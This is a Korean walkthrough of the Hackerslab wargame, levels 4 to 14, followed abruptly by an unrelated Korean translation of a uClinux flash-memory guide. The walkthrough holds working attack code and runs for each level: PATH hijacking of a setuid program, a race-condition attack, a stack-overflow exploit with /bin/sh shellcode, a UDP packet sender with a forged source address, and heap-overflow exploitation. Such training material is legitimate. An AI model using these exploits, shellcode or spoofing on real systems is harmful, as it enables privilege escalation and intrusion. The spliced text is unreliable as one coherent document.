-rwsr-x--- 1 level5 level4 30350 Aug 10 15:15 /usr/games/trojka
[level4@drill tmp]$cat > clear <-- /usr/bin/clear가 아닌 우리가 실행시킬 clear 화일 작성
/bin/pass
^D
위에서 clear의 내용을 /bin/pass가 아닌 /bin/sh로 할 경우..trojka를 실행하면..렙5의 쉘(bash$)이 나올 것이다. 이때 bash$pass 해주면 된다.
[level4@drill tmp]$chmod 755 clear
[level4@drill tmp]$ln -s /usr/games/trojka
[level4@drill tmp]$PATH=.:$PATH
[level4@drill tmp]$./trojka
레벨5 -> 레벨6
문제
어줍잖은 해커 정모씨는 문제1에서 백도어를 만든 장본인이다. 그러나 불행히도 많은 해커스랩 회원들이 자신의 백도어를 쉽게 악용하고 있다는 사실을 알고는 분통이 터져 잠을 잘 수가 없었다. 평상시 머리굴리기는 배꼽의 때만큼도 하기 싫어하는 정모씨가 드뎌 큰맘을 먹고 자신이 평상시 만든 백도어에 보안강도를 높이기로 결정했다. 그리고는 이제 이 백도어는 나만 쓸수 있다고 큰소리 치며 편안히 잠을 잘 수 있었다고 한다. 여러분의 임무는 다시 정모씨의 눈에서 피눈물이 나게 하는 것이다.
힌트
...
풀이
이번 문제는 유닉스 커맨드 중 하나인 strings를 알고 있느냐/없느냐..하는 문제이다. strings는 유닉스에서 일반 text 에디터(vi,emacs..)로는 볼 수 없는 화일들(예를 들면..공유 라이브러리인 *.so, 로긴정보를 담고있는 /var/wtmp 등등..)내에서 출력가능한 문자를 출력해주는 유틸리티이다.
일단, find 명령으로 정모씨가 백도어의 보안강도를 높이기 위해 사용한 파일을 찾아보면... /lib/security/pam_auth.so라는 것을 알 수 있는데.. 이 화일 속에 패스워드를 숨겨두었다..그런데..이 파일은 일반 text 에디터로는 볼 수 없기 때문에.. strings 명령으로 확인하면 된다.
[level5@drill tmp]$find / -user level6 -group level5 -print
/lib/security/pam_auth.so
[level5@drill tmp]$ls -l /lib/security/pam_auth.so
-rwsr-x--- 1 level6 level5 13742 Aug 10 15:15 /lib/security/pam_auth.so
[level5@drill tmp]$strings /lib/security/pam_auth.so
/lib/ld-linux.so.2
__gmon_start__
......
......
B.....
......
레벨6 -> 레벨7
문제
짜짜 여기까지 오느라 수고하신 여러분을 위해 보너스 문제를 특별히 준비하였습니다..이번엔 고생하신 여러분을 위해 패스워드를 알려드리기 위해 TCP 포트 하나를 열어두고 있습니다.. 그런데 불행히도 몇번 포트였는지 기억이 나질 않는군요.. 아무튼 수고를 ....
힌트
...
풀이
이번 문제는 network 유틸리티인 netstat의 사용법과 telnet 접속시 특정 포트로 접속하는 방법에 대한 문제이다.. 먼저, drill에 접속하여 열어두고 있는 TCP 포트를 확인해보면..아래와 같다는 것을 알 수 있을 것이다..
[level6@drill level6]$ netstat -a | grep "LISTEN"
tcp 0 0 *:2994 *:* LISTEN
tcp 0 0 *:80 *:* LISTEN
tcp 0 0 *:25 *:* LISTEN
tcp 0 0 *:6969 *:* LISTEN
tcp 0 0 *:23 *:* LISTEN
unix 0 [ ACC ] STREAM LISTENING 978 /dev/gpmctl
위에서 2994번 포트는 렙13을 위한 것이고, 80번은 HTTP, 25번은 SMTP, 23번은 TELNET이다. 6969번이 우리가 원하는 포트이다.. 이제 포트를 알았으니 접속을 해보자..
[bluesky@bluestar bluesky]$telnet drill.hackerslab.org 6969
....
level6's passwd:xxxxxxxxxxxxxxxxxxxxxxxxxxx
'Best of The Best ......'
Congratulation!! level7's passwd is 'Can't ....'
레벨7 -> 레벨8
문제
이번 문제는 고도의 노가다 작업이 필요하다. 특정파일을 찾아 실행시키면 다음 레벨의 패스워드가 나올 것이다. 그러나 곱게 알려줄 수는 없는 법.(여러분의 고통은 나의 행복) 다음 레벨을 얻기 위해선 약간의 고생이 필요할 것이다.
힌트
...
풀이
이번 문제는 패스워드를 Crack tool로 크랙하는 문제이다. 먼저 문제의 특정화일을 찾으면../dev/audio2라는 것을 알 수 있다. 이를 실행하면..
[level7@drill tmp]$find / -user level8 -group level7 -print
/dev/audio2
[level7@drill tmp]$/dev/audio2
VoE4HoQCFfMW2
이 암호화된 패스워드를 ntucrack이나 CrackJack 등의 툴을 이용하여 크랙하면 된다.
레벨8 -> 레벨9
문제
이번 부터는 해킹기법에 대한 이해가 필요합니다.. 한때 유행했었던 8lgm이 즐겨 발표했던 방법으로써 /usr/bin/ps2를 이용하여 다음 레벨을 획득하여라.
힌트
임시 파일이 /var/tmp2에 생성된다.
풀이
이번 문제는 race condition(경쟁조건)을 이용한 race attack이다.
[level8@drill tmp]$find / -user level9 -group level8 -print
/usr/bin/ps2
[level8@drill tmp]$ ls -l /usr/bin/ps2
-rws--x--- 1 level9 level8 933937 Aug 12 13:22 /usr/bin/ps2
[level8@drill tmp]$cat > race.c
int main()
{
int i;
unlink("/var/tmp2/ps2.tmp");
for(i=0;i<10;i++){
system("/usr/bin/ps2&");
...
}
^D
[level8@drill tmp]$cc -o race race.c
[level8@drill tmp]$cat > haha
/bin/pass
^D
위의 haha의 내용은 어떤거라도 상관이 없다. 위에서 symlink에서 symbolic link만 제대로 만들어지면 race condition 상태가 되어 level9의 패스워드가 나온다
[level8@drill tmp]$chmod 755 haha
[level8@drill tmp]$ ./race
file exist
Congratulations !!! your race attack success ~
level9 Password is xxxxxx
file exist
file exist
file exist
Congratulations !!! your race attack success ~
level9 Password is xxxxxx
file exist
file exist
Congratulations !!! your race attack success ~
level9 Password is xxxxxx
[level8@drill tmp]$
레벨9 -> 레벨10
문제
바운드 체킹(Bound checking)을 하지 않아 발생하는 보안문제 입니다.
힌트
/etc/bof -> suid(user=level10, group=level9)
풀이
이번 문제는 버퍼 오버플로우(Buffer based Overflow)를 이용한 해킹기법이다. 버퍼 오버플로우는 1988년 전 세계를 떠들석하게 만들었던 Morris Worm 사건에서의 finger daemon을 이용한 공격이 시초라고 말할 수 있다. 하지만 과거 이에 대한 기술적 지식이 부족했던터라 잘 알려지지 않았으나 1997년 Phrack 잡지 49호에 실린 Aleph의 "Smashing the Stack for Fun and Profit" 이라는 기사에서 이 버퍼 오버플로우에 대한 자세한 원리와 제작 방법이 소개되면서 지금 까지도 많은 양의 버퍼 오버플로우 공격방법이 생겨나고 있다.
그 원리는 메모리의 스택영역을 넘쳐흐르게 해서 리턴되는 주소지를 변경하여 원하는 임의의 명령어를 실행시키는 것이다.
exploit 소스는 위의 "Smashing the Stack for Fun and Porfit"에 자세히 나와 있다.
[level9@drill jkp]$cat > exploit4.c
#include < stdlib.h>
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 512
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_esp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
....
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
system("/bin/bash");
}
[level9@drill jkp]$cc -o exploit4 exploit4.c
[level9@drill jkp]$ln -s /etc/bof
[level9@drill jkp]$PATH=.:$PATH
[level9@drill jkp]$exploit4 768
Using address: 0xbffffd78
[level9@drill jkp]$bof $RET
hello~ x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x
煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊
x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x
퓒煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x
煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊
x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊x煊
퓒煊x煊x煊x煊x煊x煊x煊x煊x?
bash$ pass
-----------------------------------------------------------------------------
-----------------------------------------------------------------------------
패스워드: xxxxxxxxxxxxxxxx
-----------------------------------------------------------------------------
레벨10 -> 레벨11
문제
현재 해킹자유지대(FHZ:Free Hacking Zone) 서버에는 특정 데몬이 떠있다. 이 데몬은 UDP 5555번 포트를 이용하는데 www.hackerslab.org 호스트로부터 레벨10의 패스워드와 이메일 주소가 담긴 패킷이 오면 그 이메일 주소로 level11의 패스워드를 알려준다. 그 해당 포맷은 다음과 같다.
'level10의 패스워드/email주소'
ex) level10의 패스워드가 abcd이고 email 주소가 abc@aaa.ccc.ddd.rr 이라면 'abcd/abc@aaa.ccc.ddd.rr'
반드시 www.hackerslab.org로 부터 패킷이 와야 성공할 수 있으니 주의하기 바란다.
힌트
...
풀이
이번 문제는 케빈 미트닉 vs 시모무라 사건으로 세상을 떠들썩하게 했던 IP spoofing을 이용한 해킹기법을 사용하는 문제이다. FHZ(Free Hacking Zone) 서버가 신뢰하는 호스트는 hackerslab 웹서버(www.hackerslab.org:203.239.110.1)이다. 즉, UDP 5555번 포트를 이용해 FHZ 서버에 떠 있는 데몬은 자신이 신뢰하는 호스트로부터 'level10의 패스워드/email 주소' 의 내용이 담긴 패킷이 오면..위에 적힌 email 주소로 레벨11의 패스워드를 알려주는 일을 하는 데몬이다.
그러므로 우리는 위의 'level10패스/email주소'의 내용을 갖는 패킷의 발신지 주소를 203.239.110.1이 되도록(IP spoofing) 소켓 프로그래밍하여 drill 서버의 UDP 5555번 포트로 보내면 된다.
이제 소켓 프로그램을 작성해보자..
[bluesky@bluestar bluesky]$cat > socket.c
#include < stdio.h>
#include < stdlib.h>
#include < errno.h>
#include < string.h>
#include < sys/types.h>
#include < netinet/in.h>
#include < sys/socket.h>
#include < sys/wait.h>
#define DEST_IP "203.239.110.20"
#define DEST_PORT 5555
main()
{
int sockfd;
struct sockaddr_in dest_addr;
char *msg = "level10's password/ingots@blue.nownuri.net";
int len, bytes_sent;
printf("\n###############################################\n");
printf(" sent message : %s\n", msg);
if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1)
{
perror("socket error!!!");
exit(1);
}
dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
dest_addr.sin_addr.s_addr = inet_addr(DEST_IP);
bzero(&(dest_addr.sin_zero), 8);
printf(" dest address : %s\n", inet_ntoa(dest_addr.sin_addr));
connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr));
len = strlen(msg);
bytes_sent = sendto(sockfd, msg, len, 0, (struct sockaddr *)&dest_addr,sizeof(struct sockaddr));
printf(" sent bytes : %d\n", bytes_sent);
printf("###############################################\n\n");
close(sockfd);
}
^D
[bluesky@bluestar bluesky]$cc -o socket socket.c
[bluesky@bluestar bluesky]$su
Password:xxxxxxxx
[IP aliasing... root 권한 필요...]
[bluesky@bluestar bluesky]#ifconfig ppp0 203.239.110.1 up
[bluesky@bluestar bluesky]./socket
###############################################
sent message : level10's password/ingots@nownuri.net
dest address : 203.239.110.20
sent bytes : 35
###############################################
[bluesky@bluestar bluesky]$
이제 메일이 오기를 기다리면 된다.. 패킷이 정상적으로 보내졌다면..메일은 바로 온다. drill 서버가 우리가 보낸 패킷이 www.hackerslab.org(203.239.110.1)에서 온 것처럼 수신했는가는 listener를 작성하여 drill에 띄워서 확인이 가능하다. 아래에 listener.c를 보기바란다.. (이 listener.c를 drill에서 작성하여 컴파일 한후 띄워놓은 후 패킷을 보내 확인 할 수 있다.)
[level10@drill tmp]$cat > listener.c
#include < stdio.h>
#include < stdlib.h>
#include < errno.h>
#include < string.h>
#include < sys/types.h>
#include < netinet/in.h>
#include < sys/socket.h>
#include < sys/wait.h>
#define MYPORT 5555
#define MAXBUFLEN 100
main()
{
int sockfd;
struct sockaddr_in my_addr; /* my address information */
struct sockaddr_in their_addr; /* connector's address information */
int addr_len, numbytes;
char buf[MAXBUFLEN];
if ((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) == -1) {
perror("socket");
exit(1);
}
my_addr.sin_family = AF_INET; /* host byte order */
my_addr.sin_port = htons(MYPORT); /* short, network byte order */
my_addr.sin_addr.s_addr = INADDR_ANY; /* auto-fill with my IP */
bzero(&(my_addr.sin_zero), 8); /* zero the rest of the struct */
if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) {
perror("bind");
exit(1);
}
addr_len = sizeof(struct sockaddr);
if ((numbytes=recvfrom(sockfd, buf, MAXBUFLEN, 0, (struct sockaddr *)&their_addr, &addr_len)) == -1) {
perror("recvfrom");
exit(1);
}
printf("got packet from %s\n",inet_ntoa(their_addr.sin_addr));
printf("packet is %d bytes long\n",numbytes);
buf[numbytes] = '\0';
printf("packet contains \"%s\"\n",buf);
close(sockfd);
}
^D
[level10@drill tmp]$cc -o listener listener.c
[level10@drill tmp]$./listener
got packet from 203.239.110.1
packet is 35 bytes
packet contains level10's password/ingots@nownuri.net
레벨11 -> 레벨12
문제
/usr/local/bin/hof라는 프로그램은 /usr/local/bin/passwd.fail 화일을 보여준다. 하지만 우리가 원하는 파일은 usr/local/bin/passwd.success 라는 파일로 그 파일에는 다음 레벨로 올라갈 수 있는 패스워드가 저장되어 있다. 힙 영역을 이용하면 가장 쉽게 가능하다.
힌트
...
풀이
이번 문제는 힙 오버플로우(Heap based Overflow)를 이용한 해킹방법이다. 레벨9에서 보았듯이..버퍼 오버플로우에 의한 해킹기법이 소개되면서 이를 이용한 많은 해킹이 일어나 문제가 발생하자..이에 대해 아래와 같은 해결책들이 나오게 되었다.
그러나 다른 해결책들이 나오자 이번에는 Heap based Overflow에 의한 해킹기법이 나오게 되었다.
위의 글을 보면 heap overflow에 대한 자세한 설명과 소스가 있으므로 exploit 소스는 작성한 것으로 간주하고, 이제 drill에 접속해서 렙12의 패스워드를 얻는 과정을 보자.
[level11@drill level11]$cd tmp
[level11@drill tmp]$mkdir jkp
[level11@drill tmp]$cd jkp
[level11@drill jkp]$find / -user level12 -group level11 -print
/usr/local/bin/hof
[level11@drill jkp]$ls -l /usr/local/bin/hof
-rws--x--- 1 level12 level11 924592 Aug 12 12:53 /usr/local/bin/hof
[level11@drill jkp]$ln -s /usr/local/bin/hof hof
[level11@drill jkp]$cat > exploit.c
#include < stdio.h>
#include < stdlib.h>
#include < unistd.h>
#include < string.h>
#define BUFSIZE 256
#define ERROR -1
#define DIFF 16
#define VULPROG "./hof"
#define VULFILE "/usr/local/bin/passwd.success" <--/*the file 'buf' will be stored in */
u_long getesp()
{
__asm__("movl %esp,%eax");
}
int main(int argc, char **argv)
{
u_long addr;
...... 중략..
......
^D
[level11@drill jkp]$cc -o exploit exploit.c
[level11@drill jkp]$ ls -l
total 17
-rwxrwxr-x 1 level11 level11 13367 Jan 12 05:02 exploit
-rw-rw-r-- 1 level11 level11 1716 Jan 12 05:02 exploit.c
lrwxrwxrwx 1 level11 level11 18 Jan 12 05:00 hof -> /usr/local/bin/hof
[level11@drill jkp]$./hof
level11's Password : xxxxxxxxxxxxxxxxx
Segmentation fault
[level11@drill jkp]$ ./exploit 364
Overflowing tmpaddr to point to 0xbffffecc, check /usr/local/bin/passwd.success after.
level11's Password :
view_file = ./hof
ELF
[level11@drill jkp]$ ./exploit 365
Overflowing tmpaddr to point to 0xbffffecd, check /usr/local/bin/passwd.success after.
level11's Password :
view_file = /hof
error opening /hof: No such file or directory
[level11@drill jkp]$ ./exploit 366
Overflowing tmpaddr to point to 0xbffffece, check /usr/local/bin/passwd.success after.
level11's Password :
view_file = hof
ELF
[level11@drill jkp]$ ./exploit 369
Overflowing tmpaddr to point to 0xbffffed1, check /usr/local/bin/passwd.success after.
level11's Password :
view_file =
error opening : No such file or directory
[level11@drill jkp]$ ./exploit 370
Overflowing tmpaddr to point to 0xbffffed2, check /usr/local/bin/passwd.success after.
level11's Password :
view_file = /usr/local/bin/passwd.success
패스워드 : x xxxx xx xxxx forever
[level11@drill jkp]$ ./exploit 371
Overflowing tmpaddr to point to 0xbffffed3, check /usr/local/bin/passwd.success after.
level11's Password :
view_file = usr/local/bin/passwd.success
error opening usr/local/bin/passwd.success: No such file or directory
[level11@drill jkp]$ ./exploit 372
Overflowing tmpaddr to point to 0xbfffed4, check /usr/local/bin/passwd.success after.
level11's Password :
view_file = sr/local/bin/passwd.success
error opening sr/local/bin/passwd.success: No such file or directory
레벨12 -> 레벨13
문제
여러분의 hope 뛰어난 능력의 소유자인 서군은 해커스랩 관리자들이 level13으로 로긴할 때 sniffer를 돌려 통신 내용을 캡쳐하였다. 그러나 관리자들은 직접 고안한 알고리즘으로 비밀 통신을 하고 있어서 도무지 레벨13의 실제 패스워드가 무엇인지는 알 수 없었다. (그 level13의 패스워드는 tu|tSI/Z^로 암호화 되어 있었다.)
불행중 다행으로 서군은 시스템을 뒤지던 중 관리자들이 암호화 할 때 쓰는 툴이 /usr/bin/encrypt 에 있음을 발견하였다. 여러분은 서군이 발견한 encrypt를 테스트하여 암호화 알고리즘을 분석한 뒤 해독 알고리즘을 구현하여 level13의 실제 패스워드를 알아내시오
힌트
...
풀이
이번 문제는 지금까지 해온 SUID나 race condition/buffer overflow/heap overflow/IP spoofing 등과는 관계가 없다.
암호화하는 툴인 encrypt를 여러가지로 테스트 해서 tu|tSI/Z^로 암호화 되는 문자를 역추적하는 문제이다..encrypt 툴의 알고리즘을 완벽하게 분석하여 해독 알고리즘을 구현하여 푸는 문제이지만, 해독 알고리즘까지 구현하는 것은 나중에 각자 해보도록 하자..
[level12@drill tmp]$find / -user level13 -group level12 -print
/usr/bin/encrypt
[level12@drill tmp]$ls -l /usr/bin/encrypt
-rwxr-x--- 1 level13 level12 13781 Aug 10 15:15 /usr/bin/encrypt
[level12@drill tmp]$ln -s /usr/bin/encrypt enc
[level12@drill tmp]$./enc aaaaaaaaa
encrypted character: 'GGGBBB-SS'
[level12@drill tmp]$./enc aaa1aaaaa
encrypted character:'tGGBBB-SS'
[level12@drill tmp]$./enc aaaa2aaaa
encrypted character: 'GuGBBB-SS'
[level12@drill tmp]$./enc aaaaa9aaa
encrypted character: 'GG|BBB-SS'
[level12@drill tmp]$./enc aaa129aaa
encrypted character: 'tu|BBB-SS'
[level12@drill tmp]$./enc caa129aaa
encrypted character: 'tu|BBB/SS'
[level12@drill tmp]$./enc cha129aaa
encrypted character: 'tu|BBB/ZS'
[level12@drill tmp]$./enc chl129aaa
encrypted character: 'tu|BBB/Z^'
[level12@drill tmp]$./enc chl129aaa
encrypted character: 'tu|BBB/Z^'
[level12@drill tmp]$
.....
.....
[level12@drill tmp]$./enc xxxxxxxxx
encrypted character: 'tu|tSI/Z^'
레벨13 -> 레벨14
문제
이번 문제는 TCP/IP Networking을 이용해 통신을 할 수 있는가 하는 능력과..약간의 수학적 지식을 이용하는 문제입니다.. 자세한 문제설명을 위에 있구요..
힌트
...
풀이
TCP/IP Networking을 이용한 통신은 레벨10에서 어느정도 내용을 아셨을 겁니다..이번 레벨에서는 그걸 조금더 확장하는 문제입니다..(소켓 프로그래밍..을 자세히 읽어보세요..) drill 서버 2994 포트로 접속해서..문제를 받고 정답을 구해서..서버로 보내고..이런 과정을 세번 연속해서 맞추면 서버로부터 렙14의 패스워드가 옵니다..아래는 제가 작성한 client 프로그램입니다..아직 TCP/IP 프로그래밍을 많이 모르긴 하지만 참고하세요..
[bluesky@bluestar bluesky]$cat > client.c
#include < stdio.h>
#include < stdlib.h>
#include < errno.h>
#include < string.h>
#include < sys/types.h>
#include < netinet/in.h>
#include < sys/socket.h>
#include < sys/wait.h>
#include "proto.h"
#define DEST_IP "203.239.110.20"
#define DEST_PORT 2994
#define BACKLOG 10
main()
{
int i = 1, j = 1;
int sockfd, new_fd;
int len, bytes_sent, bytes_recv;
struct sockaddr_in dest_addr;
struct query_type qu;
struct reply_type re;
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
{
perror("socket error!!!");
exit(1);
}
.... 중략 ..
if (connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr)) == -1) {
perror("connect error!!!");
exit(1);
}
printf(" 서버(%s: port 2994)에 연결이 되었습니다...\n", inet_ntoa(dest_addr.sin_addr));
for (i=1; i<=3; i++) {
if(!fork()) { /* this is the child process */
if ((bytes_recv = recv(sockfd, &qu, sizeof(qu), 0)) == -1) {
perror("recv error!!!");
exit(1);
}
printf(" Received query(query_a) : %d\n", qu.query_a);
printf(" Received query(query_b) : %d\n", qu.query_b);
printf(" Received query(next_pass): (%d)%s\n", qu.flag, qu.next_pass);
strcpy(re.current_pass, "chl1296rh");
/* 서버로 부터받은 query_a/b를 dist로 넘겨 답을 구한후 re.answer로 */
re.answer = dist(qu.query_a, qu.query_b);
if ((bytes_sent = send(sockfd, &re, sizeof(re), 0)) == -1) {
perror("sendto error!!!");
exit(1);
}
}
}
close(sockfd);
}
int dist( int a, int b)
{
.....
.....
^D
[bluesky@bluestar bluesky]$
|
저자: Greg Ungerer gerg_at_snapgear.com
번역: 김남형 namhyung_at_gmail.com
1 소개
2 플래시 메모리
3 시스템
4 부트 로더의 사용 여부
5 uClinux 커널의 블럭 디바이스 드라이버
6 루트 파일 시스템
7 플래시 메모리를 위한 도구들
8 예제
9 참고 문헌
1 소개 #
이 문서는 플래시 메모리를 사용하여 부팅하고 동작하는 uClinux 시스템을 구축하는 이론과 방법에 대해서 설명한다. 이 문서의 대부분은 프로세서에 독립적이다.
먼저 플래시 메모리에 대해서 간략히 소개하고 uClinux 시스템의 여러 요소들을 플래시 메모리 상에 올릴 수 있는 여러 방법들을 설명할 것이다. 그리고는 커널 드라이버 설정과 루트 파일 시스템의 선택에 대한 부분을 설명하도록 하겠다.
비록 플래시 메모리를 사용하는 것에 초점을 두었지만, 대부분의 아이디어는 ROM 에도 동일하게 적용될 수 있다. You just won't have the ability to update it in circuit, or to run read/write filesystem with standard ROM devices.
여기서는 상세한 부분까지 살펴볼 수 있도록 실제로 사용될 수 있는 예제를 가지고 설명할 것이다. 이 문서를 읽은 후에는 플래시 메모리의 장점을 활용한 uClinux 시스템을 빌드하는 방법을 이해하고 그에 따른 여러가지 선택의 문제와 각각의 장단점을 이해할 수 있길 기대한다.
2 플래시 메모리 #
지난 20년간, ROM (그리고 EPROM) 이 임베디드 시스템에서 사용되는 비휘발성 메모리의 중심이었다. 하지만 최근의 임베디드 시스템에서는 플래시 메모리가 주로 사용된다.
플래시 메모리는 기본적으로 NOR 와 NAND (그 외에도 AND 와 같은 변종이 존재하지만 여기서는 다루지 않겠다)의 두가지 종류가 있다.
NOR 플래시를 읽는 것은 기본적으로 SRAM 을 읽는 것과 동일하므로 모든 주소 공간에 접근할 수 있고, 임의의 영역의 값을 읽어올 수 있다. 또한 NOR 플래시의 코드를 직접 실행시킬 수도 있다 (Execute-In-Place 혹은 XIP 라고 한다). 내 생각으로는 이러한 기능 때문에 작은 임베디드 시스템에서 NOR 플래시가 주로 사용되는 것 같다. 모든 코드는 잠재적으로 플래시 메모리 상에서 직접 실행될 수 있기 때문에 RAM 사용량을 줄일 수 있다. NOR 플래시를 생산하는 업체는 삼성, Intel, AMD, Fujitsu, Toshiba 등이 있다. NOR 플래시 메모리의 용량은 일반적으로 수십 KB 에서 64MB 까지이다.
일반적으로 NAND 플래시는 블럭 단위로 읽으므로 일반적인 RAM 과는 다르다. 그보다 512 단위의 블럭 크기를 가지는 하드 드라이브와 비슷하다. NAND 플래시는 비트 단위로 조작하기가 쉽지만? (cheaper), 비트 단위로 조작하는 것은 에러가 발생할 확률이 높기 때문에 소프트웨어적으로 배드 블럭을 처리해야 한다. NAND 플래시에서는 직접 코드를 실행할 수 없다. NAND 플래시를 이용한 장치 중의 흥미로운 것은 M-System 의 ?DiskOnChip 장치이다. 이 장치는 내부적으로 NAND 플래시를 이용하고 에러 인식 및 수정을 위한 로직을 포함하며 외부 CPU 접근을 용이하게 하였다. 이름 때문에 혼란스러워 하지 않길 바란다. 이 장치의 인터페이스는 일반 하드 디스크 드라이브와 다르지 않다. NAND 플래시를 생산하는 업체는 삼성, Toshiba 으로 이들은 M-System 의 ?DiskOnChip 장치의 NAND 플래시도 공급한다. NAND 플래시 메모리의 용량은 일반적으로 8MB 에서 1GB 까지이다.
플래시 메모리에 데이터를 쓰는 것은 일반적은 RAM 에 쓰는 것과는 다르다. NOR 와 NAND 플래시 모두 데이터를 쓰기전에 적절한 처리를 하는 과정이 필요하다. 쓰기 작업은 대부분 먼저 플래시 메모리의 특정 부분을 삭제하는 과정을 포함한다.
모든 플래시 메모리는 블럭 혹은 세그먼트 (좀더 정확히 말하면 삭제 세그먼트 (erase segment)) 라는 형식으로 구성된다. 이것은 플래시 메모리의 내용을 지울 수 있는 최소 단위이다. 단순히 한 바이트 혹은 몇 바이트의 데이터만을 지울 수는 없다. 블럭의 크기는 장치에 따라 다르다. 일반적인 크기는 16KB 나 128KB 이다. 삭제 연산은 플래시 메모리 블럭 내의 모든 비트의 값을 "1" 로 만든다.
데이터를 쓰는 작업은 실제로 각 비트의 값을 "0" 으로 바꾸던지 아니면 그대로 "1" 로 두는 일을 한다. 그래서 기본적으로는 원하는 모든 곳에 쓰기 연산을 수행할 수는 있다고 해도 삭제 연산을 수행하지 않고 "0" 값을 가지는 비트를 "1" 로 쓸 수는 없다.
따라서 일반적으로 플래시 메모리의 내용을 바꾸고 싶은 경우에는 먼저 삭제 연산을 수행한 후에 쓰기 연산을 수행한다. 여기에는 한가지 고려해야 할 사항이 있다. 이것은 플래시 메모리 파일 시스템의 읽기/쓰기 연산을 수행하는 경우에 볼 수 있다.
플래시 메모리의 수명은 일반적으로 삭제 연산이 수행된 횟수로 계산한다. 정확한 수는 장치에 따라 다르지만 일반적으로 10,000 번에서 1,000,000 사이의 값을 가진다. 실제로 플래시 메모리 블럭에 얼마나 자주 삭제/쓰기 연산이 수행되는지 주의깊은 관심을 기울일 필요가 있다. 이것은 플래시 메모리 상에 읽기/쓰기 연산을 지원하는 파일 시스템을 올린 경우에는 특히 중요하다.
여기서는 주로 NOR 플래시에 대해 다루도록 하겠다. NOR 플래시는 작은 시스템에서 많이 사용되며 uClinux 시스템에서 주로 이용되는 플래시 메모리이기 때문이다.
3 시스템 #
임베디드 시스템내에 포함되는 플래시와 RAM 의 용량에는 언제나 trade-off 가 있다. 주로 가격을 먼저 고려하게 되는데, 일반적으로 플래시 메모리가 RAM 보다 비싸다. 마지막으로는 시스템의 세부적인 요구사항에 따른 메모리의 크기가 결정된다.
플래시 메모리는 시스템의 코드와 데이터를 저장하고 전원이 켜졌을 때 시스템이 수행되는 장치이고 uClinux 의 장치들이 파일을 저장하는 주 저장 장치이다.
아주 간단한 방식으로, 프로세서가 시작되는 위치에 uClinux 의 시작 코드를 저장해 두고 플래시 메모리를 하나의 커다란 저장 공간으로서 사용할 수 있다.
다른 방식으로는, 플래시 메모리를 분리된 영역의 파티션으로 나누는 것이 편리할 수 있다. 이것은 디스크 드라이브 파티션의 개념과 동일하지만 더 단순하고 작은 크기를 가진다. 일반적인 플래시 메모리의 파티션은 다음과 같다:
블럭 용도
0 부트 로더
1 공장 설정값 (factory configuration)
2
.
. 커널
.
X
.
. 루트 파일시스템
.
Y
위에서는 0 번 블럭에 부트 로더 코드를 넣고, 1번 블럭에는 공장 설정값 (이더넷 MAC 주소값 혹은 커널 명령행 옵션 등) 이 있으며, 2번 블럭부터 X번 블럭 까지는 커널 코드를, 마지막으로 X번 블럭 다음부터 Y번 블럭까지 루트 파일 시스템을 올렸다.
이것은 매우 단순한 예제이다. 시스템에서 필요한 경우에는 당연히 보다 복잡한 파티션으로 나누어 질 수 있다. 뒤에서 살펴보겠지만 플래시 메모리를 지원하는 uClinux 의 블럭 디바이스는 이러한 파티셔닝의 개념을 지원한다. Note that the partitions are always a whole number of Flash segments. You really want to do it this way since you can only erase an entire segment at a time.
또한 위의 예제에서는 커널과 루트 파일 시스템을 다른 파티션으로 분리하였다. 이것은 일반적인 리눅스의 설정 방식이 아니다. 일반적으로는 리눅스 커널은 루트 파일 시스템 내에 일반 실행 파일의 형태로 존재한다. 이 방법의 문제점은 (LILO 나 GRUB 과 같은) 똑똑한 부트 로더 프로그램이 필요하다는 것이다. 이러한 부트 로더 프로그램은 (커널 이미지를 포함하는) 하드 디스크 블럭을 RAM 상에 로드하는 일을 수행한다. 커널 이미지를 플래시 메모리 상의 연속적인 공간에 저장하는 것은 두가지 장점을 가진다. 하나는 플래시 메모리 상에서 바로 실행시킬 수 있다는 것이고 (XIP), 다른 하나는 부트 로더가 단순해 진다는 것이다 (심지어 부트 로더가 필요 없을 수도 있다).
커널과 루트 파일 시스템을 배치하는 몇가지 방법이 있다. 최선의 방법을 선택하는 데에는 여러가지 trade-off 가 존재한다. 여기에서는 가장 일반적인 몇가지 방법을 살펴보면서 각각의 장단점에 대해 알아보도록 하자.
